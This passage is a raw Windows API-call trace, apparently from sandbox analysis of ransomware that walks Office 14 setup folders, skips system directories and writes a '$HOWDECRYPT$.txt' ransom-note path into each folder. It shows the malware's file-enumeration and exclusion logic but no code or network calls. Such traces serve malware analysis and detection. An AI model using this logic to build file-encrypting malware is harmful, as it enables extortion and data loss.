pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\$HOWDECRYPT$.txt") returned 112 [0087.893] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\$HOWDECRYPT$.txt") returned 112 [0087.893] GetProcessHeap () returned 0x2c0000 [0087.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x37a340 [0087.893] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb50) returned 0x37a750 [0087.893] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.893] lstrcmpiW (lpString1="OneNote.en-us", lpString2="Windows") returned -1 [0087.893] lstrlenW (lpString="Windows") returned 7 [0087.893] lstrcmpiW (lpString1="OneNote.en-us", lpString2="$Recycle.bin") returned 1 [0087.893] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.893] lstrcmpiW (lpString1="OneNote.en-us", lpString2="System Volume Information") returned -1 [0087.893] lstrlenW (lpString="System Volume Information") returned 25 [0087.893] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned 97 [0087.893] lstrcmpW (lpString1="OneNote.en-us", lpString2=".") returned 1 [0087.893] lstrcmpW (lpString1="OneNote.en-us", lpString2="..") returned 1 [0087.893] GetProcessHeap () returned 0x2c0000 [0087.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.893] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*") returned 99 [0087.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.904] lstrlenW (lpString="Windows") returned 7 [0087.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.904] lstrlenW (lpString="System Volume Information") returned 25 [0087.904] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\.") returned 99 [0087.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.904] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.904] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.904] lstrlenW (lpString="Windows") returned 7 [0087.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.904] lstrlenW (lpString="System Volume Information") returned 25 [0087.904] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\..") returned 100 [0087.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.904] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.904] lstrcmpiW (lpString1="OneNoteMUI.XML", lpString2="Windows") returned -1 [0087.904] lstrlenW (lpString="Windows") returned 7 [0087.905] lstrcmpiW (lpString1="OneNoteMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.905] lstrcmpiW (lpString1="OneNoteMUI.XML", lpString2="System Volume Information") returned -1 [0087.905] lstrlenW (lpString="System Volume Information") returned 25 [0087.905] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0087.905] StrStrIW (lpFirst="OneNoteMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.905] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.905] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0087.905] GetProcessHeap () returned 0x2c0000 [0087.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x37a470 [0087.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb50) returned 0x37a750 [0087.906] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.906] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.906] lstrlenW (lpString="Windows") returned 7 [0087.906] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.906] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.906] lstrlenW (lpString="System Volume Information") returned 25 [0087.906] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0087.906] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.906] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.906] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0087.906] GetProcessHeap () returned 0x2c0000 [0087.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x376810 [0087.906] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb58) returned 0x37a750 [0087.906] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.906] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.906] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\$HOWDECRYPT$.txt") returned 114 [0087.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\$HOWDECRYPT$.txt") returned 114 [0087.907] GetProcessHeap () returned 0x2c0000 [0087.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x126) returned 0x375808 [0087.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb60) returned 0x37a750 [0087.907] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.907] lstrcmpiW (lpString1="OSETUP.DLL", lpString2="Windows") returned -1 [0087.907] lstrlenW (lpString="Windows") returned 7 [0087.908] lstrcmpiW (lpString1="OSETUP.DLL", lpString2="$Recycle.bin") returned 1 [0087.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.908] lstrcmpiW (lpString1="OSETUP.DLL", lpString2="System Volume Information") returned -1 [0087.908] lstrlenW (lpString="System Volume Information") returned 25 [0087.908] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0087.908] StrStrIW (lpFirst="OSETUP.DLL", lpSrch=".spyhunter") returned 0x0 [0087.908] lstrcmpW (lpString1="OSETUP.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.908] lstrcmpW (lpString1="OSETUP.DLL", lpString2="_uninstalling_.png") returned 1 [0087.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0087.908] GetProcessHeap () returned 0x2c0000 [0087.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x375938 [0087.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb68) returned 0x37a750 [0087.908] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.908] lstrcmpiW (lpString1="OSetupPS.dll", lpString2="Windows") returned -1 [0087.908] lstrlenW (lpString="Windows") returned 7 [0087.908] lstrcmpiW (lpString1="OSetupPS.dll", lpString2="$Recycle.bin") returned 1 [0087.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.908] lstrcmpiW (lpString1="OSetupPS.dll", lpString2="System Volume Information") returned -1 [0087.908] lstrlenW (lpString="System Volume Information") returned 25 [0087.908] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0087.908] StrStrIW (lpFirst="OSetupPS.dll", lpSrch=".spyhunter") returned 0x0 [0087.908] lstrcmpW (lpString1="OSetupPS.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.908] lstrcmpW (lpString1="OSetupPS.dll", lpString2="_uninstalling_.png") returned 1 [0087.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0087.908] GetProcessHeap () returned 0x2c0000 [0087.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x375a40 [0087.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb70) returned 0x37a750 [0087.909] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.909] lstrcmpiW (lpString1="Outlook.en-us", lpString2="Windows") returned -1 [0087.909] lstrlenW (lpString="Windows") returned 7 [0087.909] lstrcmpiW (lpString1="Outlook.en-us", lpString2="$Recycle.bin") returned 1 [0087.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.909] lstrcmpiW (lpString1="Outlook.en-us", lpString2="System Volume Information") returned -1 [0087.909] lstrlenW (lpString="System Volume Information") returned 25 [0087.909] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned 97 [0087.909] lstrcmpW (lpString1="Outlook.en-us", lpString2=".") returned 1 [0087.909] lstrcmpW (lpString1="Outlook.en-us", lpString2="..") returned 1 [0087.909] GetProcessHeap () returned 0x2c0000 [0087.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.910] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*") returned 99 [0087.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.959] lstrlenW (lpString="Windows") returned 7 [0087.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.959] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.959] lstrlenW (lpString="System Volume Information") returned 25 [0087.959] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\.") returned 99 [0087.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.960] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.960] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.960] lstrlenW (lpString="Windows") returned 7 [0087.960] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.960] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.960] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.960] lstrlenW (lpString="System Volume Information") returned 25 [0087.960] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\..") returned 100 [0087.960] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.960] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.960] lstrcmpiW (lpString1="OutlookMUI.XML", lpString2="Windows") returned -1 [0087.960] lstrlenW (lpString="Windows") returned 7 [0087.960] lstrcmpiW (lpString1="OutlookMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.960] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.960] lstrcmpiW (lpString1="OutlookMUI.XML", lpString2="System Volume Information") returned -1 [0087.960] lstrlenW (lpString="System Volume Information") returned 25 [0087.960] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0087.960] StrStrIW (lpFirst="OutlookMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.960] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.960] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.961] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0087.961] GetProcessHeap () returned 0x2c0000 [0087.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x35e048 [0087.963] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb58) returned 0x37a750 [0087.963] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.963] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.964] lstrlenW (lpString="Windows") returned 7 [0087.964] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.964] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.964] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.964] lstrlenW (lpString="System Volume Information") returned 25 [0087.964] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0087.964] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.964] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.964] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.964] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0087.964] GetProcessHeap () returned 0x2c0000 [0087.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x37a340 [0087.964] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb60) returned 0x37a750 [0087.964] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.964] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.967] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\$HOWDECRYPT$.txt") returned 114 [0087.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\$HOWDECRYPT$.txt") returned 114 [0087.967] GetProcessHeap () returned 0x2c0000 [0087.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x126) returned 0x353bb0 [0087.968] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb68) returned 0x37a750 [0087.983] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.983] lstrcmpiW (lpString1="pidgenx.dll", lpString2="Windows") returned -1 [0087.983] lstrlenW (lpString="Windows") returned 7 [0087.983] lstrcmpiW (lpString1="pidgenx.dll", lpString2="$Recycle.bin") returned 1 [0087.983] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.984] lstrcmpiW (lpString1="pidgenx.dll", lpString2="System Volume Information") returned -1 [0087.984] lstrlenW (lpString="System Volume Information") returned 25 [0087.984] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0087.984] StrStrIW (lpFirst="pidgenx.dll", lpSrch=".spyhunter") returned 0x0 [0087.984] lstrcmpW (lpString1="pidgenx.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.984] lstrcmpW (lpString1="pidgenx.dll", lpString2="_uninstalling_.png") returned 1 [0087.984] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0087.984] GetProcessHeap () returned 0x2c0000 [0087.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x353ce0 [0087.984] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb68) returned 0x37a750 [0087.984] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.984] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0087.984] lstrlenW (lpString="Windows") returned 7 [0087.984] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0087.984] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.984] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0087.984] lstrlenW (lpString="System Volume Information") returned 25 [0087.984] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0087.984] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".spyhunter") returned 0x0 [0087.984] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.984] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0087.984] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 108 [0087.985] GetProcessHeap () returned 0x2c0000 [0087.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x375a40 [0087.985] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb70) returned 0x37a750 [0087.985] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.985] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="Windows") returned -1 [0087.985] lstrlenW (lpString="Windows") returned 7 [0087.985] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="$Recycle.bin") returned 1 [0087.985] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.985] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="System Volume Information") returned -1 [0087.985] lstrlenW (lpString="System Volume Information") returned 25 [0087.985] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0087.985] StrStrIW (lpFirst="pkeyconfig.companion.dll", lpSrch=".spyhunter") returned 0x0 [0087.985] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.985] lstrcmpW (lpString1="pkeyconfig.companion.dll", lpString2="_uninstalling_.png") returned 1 [0087.985] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig.companion.dll") returned 108 [0087.985] GetProcessHeap () returned 0x2c0000 [0087.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x375b68 [0087.985] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb78) returned 0x37a750 [0087.985] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.985] lstrcmpiW (lpString1="PowerPoint.en-us", lpString2="Windows") returned -1 [0087.985] lstrlenW (lpString="Windows") returned 7 [0087.985] lstrcmpiW (lpString1="PowerPoint.en-us", lpString2="$Recycle.bin") returned 1 [0087.986] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.986] lstrcmpiW (lpString1="PowerPoint.en-us", lpString2="System Volume Information") returned -1 [0087.986] lstrlenW (lpString="System Volume Information") returned 25 [0087.986] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned 100 [0087.986] lstrcmpW (lpString1="PowerPoint.en-us", lpString2=".") returned 1 [0087.986] lstrcmpW (lpString1="PowerPoint.en-us", lpString2="..") returned 1 [0087.986] GetProcessHeap () returned 0x2c0000 [0087.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.986] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*") returned 102 [0087.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.014] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.014] lstrlenW (lpString="Windows") returned 7 [0088.014] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.014] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.014] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.015] lstrlenW (lpString="System Volume Information") returned 25 [0088.015] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\.") returned 102 [0088.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.015] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.015] lstrlenW (lpString="Windows") returned 7 [0088.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.015] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.015] lstrlenW (lpString="System Volume Information") returned 25 [0088.015] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\..") returned 103 [0088.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.015] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.015] lstrcmpiW (lpString1="PowerPointMUI.XML", lpString2="Windows") returned -1 [0088.015] lstrlenW (lpString="Windows") returned 7 [0088.019] lstrcmpiW (lpString1="PowerPointMUI.XML", lpString2="$Recycle.bin") returned 1 [0088.019] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.019] lstrcmpiW (lpString1="PowerPointMUI.XML", lpString2="System Volume Information") returned -1 [0088.019] lstrlenW (lpString="System Volume Information") returned 25 [0088.019] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0088.019] StrStrIW (lpFirst="PowerPointMUI.XML", lpSrch=".spyhunter") returned 0x0 [0088.019] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.019] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="_uninstalling_.png") returned 1 [0088.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0088.019] GetProcessHeap () returned 0x2c0000 [0088.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12e) returned 0x375c90 [0088.019] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb80) returned 0x37a750 [0088.019] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.019] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.019] lstrlenW (lpString="Windows") returned 7 [0088.019] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.019] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.019] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.019] lstrlenW (lpString="System Volume Information") returned 25 [0088.019] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0088.019] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.020] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.020] lstrcmpW (lpString1="SETUP.XML", 